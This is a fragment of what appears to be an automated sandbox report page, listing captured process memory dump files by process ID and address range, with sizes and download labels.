memory/4416-681-0x0000000000000000-mapping.dmp

Download
memory/4428-637-0x0000000000000000-mapping.dmp

Download
memory/4456-633-0x0000000000000000-mapping.dmp

Download
memory/4480-616-0x0000000000000000-mapping.dmp

Download
memory/4540-635-0x0000000000000000-mapping.dmp

Download
memory/4572-620-0x0000000000000000-mapping.dmp

Download
memory/4620-673-0x0000000000000000-mapping.dmp

Download
memory/4636-334-0x0000000005910000-0x0000000005911000-memory.dmp

Filesize
4KB

Download
memory/4636-314-0x0000000000000000-mapping.dmp

Download
memory/4644-624-0x0000000000000000-mapping.dmp

Download
memory/4700-627-0x0000000000000000-mapping.dmp

Download
memory/4736-643-0x000000000047B92E-mapping.dmp

Download
memory/4736-649-0x0000000005730000-0x0000000005C2E000-memory.dmp

Filesize
5.0MB

Download
memory/4744-577-0x0000000000000000-mapping.dmp

Download
memory/4820-555-0x0000000000000000-mapping.dmp

Download
memory/4832-559-0x0000000000000000-mapping.dmp

Download
memory/4868-650-0x0000000000000000-mapping.dmp

Download
memory/4872-563-0x0000000000000000-mapping.dmp

Download
memory/4872-573-0x0000000004FF0000-0x000000000508C000-memory.dmp

Filesize
624KB

Download
memory/4924-660-0x000001BE239B0000-0x000001BE239D0000-memory.dmp

Filesize
128KB

Download
memory/4924-662-0x000001BE239D0000-0x000001BE239F0000-memory.dmp

Filesize
128KB

Download
memory/4924-588-0x00007FFF90E80000-0x00007FFF90E82000-memory.dmp

Filesize
8KB

Download
memory/4924-574-0x0000000000000000-mapping.dmp

Download
memory/4924-597-0x000001BE23990000-0x000001BE239B0000-memory.dmp

Filesize
128KB

Download
memory/4964-653-0x0000000000000000-mapping.dmp

Download
memory/5064-589-0x0000000000000000-mapping.dmp

Download
memory/5072-655-0x0000000000000000-mapping.dmp

Download